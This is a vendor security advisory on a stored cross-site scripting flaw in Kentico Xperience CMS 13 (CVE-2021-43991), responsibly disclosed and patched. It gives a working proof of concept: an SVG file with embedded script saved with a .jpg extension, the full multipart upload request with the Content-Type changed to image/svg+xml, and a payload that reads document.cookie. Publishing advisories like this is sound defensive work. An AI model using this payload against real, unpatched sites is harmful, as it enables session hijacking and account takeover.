Security Advisory: Persistent XSS via Avatar Upload in Kentico CMS (CVE-2021-43991)

The Kentico CMS (13.0.4001.0 Xperience platform version tested locally) is vulnerable to a persistent Cross-Site Scripting (XSS) vulnerability (also known as Stored or Second-Order XSS).

Vulnerability Summary

The Kentico  Xperience CMS version 13.0 – 13.0.43 is vulnerable to a persistent Cross-Site Scripting (XSS) vulnerability (also known as Stored or Second-Order XSS).
Persistent XSS vulnerabilities occur when the application stores and retrieves client supplied data without proper handling of dangerous content. This type of XSS vulnerability is exploited by submitting malicious script content to the application which is then retrieved and executed by other application users.
The attacker could exploit this to conduct a range of attacks against users of the affected application such as session hijacking, account take over and accessing sensitive data.

You can read more about XSS here:
https://appcheck-ng.com/cross-site-scripting/

Technical Analysis

For this example, the Dancing Goat sample application that ships with the Kentico Xperience platform trial is used. However, the vulnerability affects many real world Kentico deployments as observed by the AppCheck research team. A proof of concept example was provided to Kentico using one of their public facing applications.

The vulnerability occurs due to the way Avatar images files are stored and retrieved.

Registered users across a range of Kentico powered applications can upload image files to customise the avatar associated with their profile. The uploaded file extension is validated against a list of known good image file types before being accepted. The uploaded image file is then retrieved using a separate endpoint in order to be displayed within the application.

The following application behavior creates an exploitable condition:

Upload
a) It is possible to upload a file and set the file Content-Type  (mime-type) to any value as long as it beings with “image/”. The supplied Content-Type value is stored and returned within the Content-Type header when the file is downloaded. Although the “svg” extension is not permitted, any permitted extension can be used along with a file content-type value of image/svg+xml in order to exploit this flaw.

Render
b) When accessing the uploaded file directly using its rendering URL, the “Content-Type” and file content used in the upload are returned unchanged. Therefore, it is possible to present any image file type to the browser including SVG.
c) A “Content-Disposition” header is returned when rendering the image, however it is set to “inline” indicating it can be displayed inside the Web page, or as the Web page.

It is possible to exploit this flaw by embedding JavaScript code within an SVG file, when the image is accessed by the target user, the JavaScript executes in the context of the users session with the application.

 

Recreating the vulnerability

Note: To recreate this issue, you will need an intercepting proxy such as Fiddler that is able to replay and modify the image upload (or alternate method of manipulating the content-type value within the multipart boundary as shown).

 

Step 1: Upload the XSS image payload

First create a file with a .jpg extension with the following content;

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" >
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>

Authenticate to the target application and upload the file as your avatar image. Identify the upload request and resend it, this time changing the “Content-Type” within the body (not the http headers) to “image/svg+xml”. The following request was used in our environment:

POST /kentico13_1_dancinggoatmvc/account/changeavatar/ HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryy1EkItbBBRLpNCAg
… Truncated

------WebKitFormBoundaryy1EkItbBBRLpNCAg
Content-Disposition: form-data; name="__RequestVerificationToken"

tcftOraqI42VZK7sT0vJflcHvjXhYyDOMsZz0ClmHN-ay8GAoz5Gsf2rrHWsBbZM0-pWEliBZwQdwOSkGQXPL1rp_Y3aBPI7iZltWLNf0vM_oJgnqJuhoIrJZn0LDh1she06O_YxHa1zKdk1yX1TNg2
------WebKitFormBoundaryy1EkItbBBRLpNCAg
Content-Disposition: form-data; name="avatarUpload"; filename="evil.jpg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" >
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>

------WebKitFormBoundaryy1EkItbBBRLpNCAg--

Step 2: Render the image to execute the payload

Once the image file is uploaded, identify the <img> src attribute URL being used to load and display the image to the user. In our lab environment the URL can be found in the following HTML element:

<div class="dropdown-desktop">
<img src="/Kentico13_1_DancingGoatMvc/getavatar/f5cf51ae-7206-4514-a191-e48bcec6fec1/avatar.jpg" class="dropdown-desktop-avatar" alt="avatar" />

 

Note that the file segment or the URL can be changed from avatar.jpg to any value. Accessing the URL will demonstrate the issue.

Screen Shot: Executing alert(document.cookie)

Screen Shot: Proof-of-Concept provided to Kentico.

 

Acknowledgements

AppCheck would like to thank Kentico Software for their speedy response and ease to work with during this process.

Check out their latest hotfixes here: https://devnet.kentico.com/download/hotfixes

Timeline

09/09/2021 – Email report sent to Kentico

13/09/2021 – Report acknowledged

17/09/2021 – Hotfix Released

21/09/2021 – AppCheck advisory published.

About AppCheck

AppCheck is a software security vendor based in the UK, offering a leading security scanning platform that automates the discovery of security flaws within organisations websites, applications, network, and cloud infrastructure.

As always, if you require any more information on this topic or want to see what unexpected vulnerabilities AppCheck can pick up in your website and applications then please get in contact with us: info@localhost

Get started with Appcheck

No software to download or install.

Contact us or call us 0113 887 8380

About Appcheck

AppCheck is a software security vendor based in the UK, offering a leading security scanning platform that automates the discovery of security flaws within organisations websites, applications, network and cloud infrastructure. AppCheck are authorized by te Common Vulnerabilities and Exposures (CVE) Program aas a CVE Numbering Authority (CNA)

No software to download or install.
Contact us or call us 0113 887 8380

Start your free trial

Your details
IP Addresses
URLs

Get in touch